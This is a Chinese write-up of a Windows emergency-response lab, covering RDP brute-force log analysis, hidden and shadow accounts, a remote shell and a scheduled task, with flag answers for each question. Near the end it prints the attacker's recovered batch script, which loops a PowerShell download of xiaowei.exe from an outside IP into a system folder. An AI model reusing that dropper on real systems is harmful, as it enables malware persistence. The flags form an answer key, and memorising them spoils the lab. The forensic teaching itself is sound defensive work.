百度不收录手机网站吗关键词分析工具有哪些

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

---

靶机简介

服务器场景操作系统 Windows7
服务器账号密码：winlog/winlog123
连接端口为：ip:3389
按照题目提示可以根据系统功能分析，或桌面工具进行辅助分析
注意：远控软件内IP为虚拟IP，如在进行进程中没有找到相关外连，应该是由于连接超时造成的断开了，重启环境服务器或软件即可继续对外发起请求，请见谅
注意：题目中shell如需在本地分析，提前关闭杀毒软件，会被杀掉，非免杀
注意：winlog用户在操作关于系统权限功能时，一定要使用管理员权限打开工具再去执行

题目来源公众号 州弟学安全

题目描述：
某台Windows服务器遭到攻击者入侵，管理员查看发现存在大量rdp爆破的请求，攻击者使用了不同位置的IP(此处模拟)，进行爆破并成功，并成功进入了系统，进入系统后又做了其它危害性操作，请根据各题目完成填写

题目简介：

1. 审计桌面的logs日志，定位所有扫描IP，并提交扫描次数
2. 审计相关日志，提交rdp被爆破失败次数
3. 审计相关日志，提交成功登录rdp的远程IP地址，多个以&连接,以从小到大顺序排序提交
4. 提交黑客创建的隐藏账号
5. 提交黑客创建的影子账号
6. 提交远程shell程序的连接IP+端口，以IP:port方式提交
7. 黑客植入了一个远程shell，审计相关进程和自启动项提交该程序名字
8. 黑客使用了计划任务来定时执行某shell程序，提交此程序名字

–

如何进行远程连接可以看这篇文章；

---

1. 审计桌面的logs日志，定位所有扫描IP，并提交扫描次数

首先我们进入靶机，根据题目的要求，审查所有的log日志；

输入命令eventvwr.msc进入事件查看器 —> 选择“安全”日志 —> 手动查看
使用桌面的Fulleventlogview工具 —> 工具筛查

这里我们发现桌面上有着类似于apache的服务器日志，根据之前我们所学的Apache日志分析，我们很容易通过命令去筛选相应的IP：

这里我们随便打开，发现有着许多的日志：

这里我将access.log日志复制到我的Linux机器上进行分析，不懂的可以看这篇文章：

然后使用命令进行IP次数的筛选：

awk '{print $1}' access.log | sort | uniq -c | sort -nr

解释：

1. awk '{print $1}' access.log :
   作用：从access.log日志文件中提取每行的第一个字段（$1）
   原理：

   • awk是文本处理工具，按行解析文件，默认以空格 / 制表符分割字段。
   • $1表示第一列字段，常见场景如提取 IP 地址（日志中第一列通常是访问者 IP）

   示例：

   • 若日志行是192.168.1.1 - [23/May/2025:10:00:01] “GET /index.html HTTP/1.1” 200，则提取192.168.1.1

2. sort：表示对提取的字段进行排序

3. uniq -c ：表示对连续相同的行进行去重，并统计每行出现的次数。

4. sort -nr ：对统计结果按次数进行降序排序（从多到少）

   • -n：按数值大小排序
   • -r：降序排列（-升序)

---

这里我们得到了几个IP，再重新看题目”定位所有扫描IP，并提交扫描次数“,

注意：这里需要的是扫描IP ，也就是说本地IP（127.0.0.1）或者没有攻击行为的IP都不算入；

所以我们还可以针对这些不是本机的IP进行分别的查看：

# 替换里面的ip分别分析：
cat ./access.log |grep '192.168.150.67' |more  
cat ./access.log |grep '192.168.150.1' |more 
cat ./access.log |grep '192.168.150.33' |more 
cat ./access.log |grep '192.168.150.60' |more 

（1）针对第一个IP192.168.150.67，我们发现它好像在进行目录扫描等操作：

往下翻更是可疑，还进行目录的遍历以及绕过：

因此我们首先可以确定这个192.168.150.67是可疑IP；

（2）针对IP192.168.150.1，发现有一些js，以及php文件的访问登录：

其中大部分都是对网站的dedecms进行操作，基本认定无可疑行为；

（3）然后针对IP192.168.150.33,我们又有了新的发现：

首先就是有nmap的扫描器的特征：

众所周知：nmap主要用于网络探测和安全扫描，可发现网络主机、检测开放端口及运行的服务，助力网络管理与安全评估。
所以又能确定一个可疑IP；

（4）最后一个IP：192.168.150.60

其实这是受害者的IP，所以直接排除；

综上所述，有两个可疑的iP192.168.150.67和192.168.150.33 因此把他们的次数加起来即可；
flag{6385}

–

2. 审计相关日志，提交rdp被爆破失败次数

题目让我们提交"rdp"被爆破失败次数，也就是远程桌面登录协议RDP，这个时候我们就要用到系统的日志；

这里我们打开cmd，输入命令eventvwr.msc打开事件查看器，来找到相应的日志；

然后把应用程序，安全，系统三个文件保存到桌面，

针对题目所说的远程登录日志，所以我们要查看”安全“日志进行分析；

以下是一些常见的与登录相关的事件ID及其含义

• 4624：表示帐户已成功登录。这个事件ID可以用来筛选系统中所有成功登录的记录
• 4625：表示帐户登录失败。这个事件ID可以帮助我们判断是否存在RDP爆破攻击等情况
• 4634：表示帐户被注销。这个事件ID记录了用户注销的情况 4647：表示用户发起注销。这个事件ID记录了用户主动注销的行为
• 4648：表示试图使用明确的凭证登录。这个事件ID可以查看远程登录的相关信息，比如IP地址等
• 4672：表示超级管理员登录
• 4720：表示新用户的创建

RDP爆破通常会产生大量登录失败的事件，登录失败的事件 ID 是 4625。通过统计这些事件的数量，我们就可以得出爆破攻击失败的次数。所以我们在”安全“日志中输入4625 进行查看：

那最后根据题目的要求：提交rdp被爆破失败次数：

flag{2594}

–

3.审计相关日志，提交成功登录rdp的远程IP地址，多个以&连接,以从小到大顺序排序提交

根据题目筛选4624事件ID，我们点击进去查找相应的IP地址：

结果显示：

这里也是得到几个IP，但我觉得手动筛选还是太慢了；

当然还有更便捷一些的方法，我们直接筛选事件ID-4648：
在Windows事件日志中，事件ID 4648表示“使用显式凭据登录”，即用户通过手动输入用户名和密码完成身份验证（而非依赖自动登录或凭据缓存机制）。该事件常被用于筛选通过远程桌面协议（RDP）等场景下使用特定账户进行显式登录的操作记录，以便追踪账户登录行为及开展安全审计。

结果显示：


注意：但是使用4648，筛选的结果数量较少，所以要按情况使用；

flag{192.168.150.1&192.168.150.128&192.168.150.178}

–

4. 提交黑客创建的隐藏账号

这里就要介绍一下Windows查看隐藏用户的方法：
（1）使用命令net use简单的查看
（2）cmd里输入lusrmgr.msc查看组策略
（3）到注册表检查系统用户信息

所以，我们按照上述方法一个个查看：

方法一：

net user  

方法二：
lusrmgr.msc是Windows系统中用于管理本地用户与组的管理控制台程序（Microsoft Management Console，MMC）。查看账户信息、创建新用户/组、删除冗余账户以及修改账户权限配置等.

仔细观察还有一个：hackers$用户，这个用户比较有意思，可能有的师傅是第一次见，那我这里简单分析一下；

简单来说这是影子用户（Shadow Accounts）是一类隐蔽性用户账户，其特点是在系统常规用户列表中不可见，但实际存在并拥有系统或网络访问权限。这类账户常被黑客用于隐藏入侵痕迹，通过规避管理员常规排查来维持对目标系统的持久控制。

方法三：
Windows 注册表中用户相关的完整路径：
本地用户账户信息
路径：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
说明：存储所有本地用户账户的加密信息，需管理员权限。用户 SID（安全标识符）以十六进制形式存储（如000001F4）。

根据路径进行查找：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

所以结果：

flag{hacker$}

–

5. 提交黑客创建的影子账号

注意：影子账号通过lusrmgr.msc和net user是看不出来的，之前的组策略能看见纯粹是靶机自身的问题，所以不用在意；

这里也有两种办法告诉大家：

方法一：
命令wmic useraccount get Name，用于查询本地计算机上所有用户账户名称的命令。它会列出所有用户账户的名称，包括本地用户和系统用户。

wmic useraccount get Name

• wmic：Windows 管理工具的命令行接口，允许用户从命令行查询系统信息。
• useraccount：指定查询的对象为用户账户。
• get Name：获取用户账户的名称。

方法二：
注册表，不多说了，直接查看上题的步骤：
根据路径进行查找：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

方法三：
使用D盾进行系统文件的扫描，也能得到结果；（以管理员身份运行）

所以：

flag{hacker$}

–

6. 提交远程shell程序的连接IP+端口，以IP:port方式提交

题目让我们提交远程shell程序的连接IP及端口以IP:port方式进行提交，所以这里我们可以直接使用命令：netstat -ano，来看看系统中的所有网络连接：

但这是错误的结果，因为正常来说这里就应该出现一个可疑连接；

但尝试了多次都无法成功，给大家看一下正常的情况：

所以结果：

flag{185.117.118.21:4444}

–

7. 黑客植入了一个远程shell，审计相关进程和自启动项提交该程序名字

根据题目，我们可以检查计算机上的计划任务以及启动项等；

搜索”计划任务“即可；

这里我们发现了一个xiaowei.exee的恶意程序，有这个定时任务触发执行；

同理，也可以通过工具进行查找：（应急响应中，工具的使用也是很重要的）

随后放进云沙箱里看看会造成什么危害：

常见的威胁情报中心：

1. 银河麒麟（ThreatBook）：银河麒麟是国内领先的网络安全威胁情报服务提供商，其威胁情报库包括恶意软件、攻击源IP、域名等方面的信息。

2. 国家互联网应急中心（CNCERT）：CNCERT 是中国政府统一组织和协调全国互联网安全工作的部门，其威胁情报库包括漏洞、恶意代码、攻击事件等方面的信息。

3. 漏洞盒子（KnownSec）：漏洞盒子是一家致力于网络安全防御和攻防技术研究的公司，其威胁情报库包括漏洞、恶意代码等方面的信息。

4. 360威胁情报中心（360 TI Center）：360 威胁情报中心聚焦于威胁情报、安全事件响应和恶意代码研究等领域，其威胁情报库包括APT攻击、恶意URL等方面的信息。

结果显示：

结果：

flag{xiaowei.exe}

–

8. 黑客使用了计划任务来定时执行某shell程序，提交此程序名字

随后我们找到程序的位置，去查看还有什么收获：


用”记事本“打开：

@echo off
:loop
echo Requesting download from 185.117.118.21:1111/xiaowei.exe...
start /b powershell -Command "Invoke-WebRequest -Uri 'http://185.117.118.21/xiaowei.exe' -OutFile 'C:\Windows\system64\systemWo\xiaowei.exe'"
timeout /t 300 /nobreak >nul
goto loop

脚本的作用：

• 定期从 IP 地址185.117.118.21的服务器下载一个名为xiaowei.exe的文件，并将其保存到系统目录C:\Windows\system64\systemWo\下。脚本会无限循环执行这个下载过程，每次下载间隔 5 分钟（300 秒）。

所以结果为：

flag{download.bat}

总结：

结束。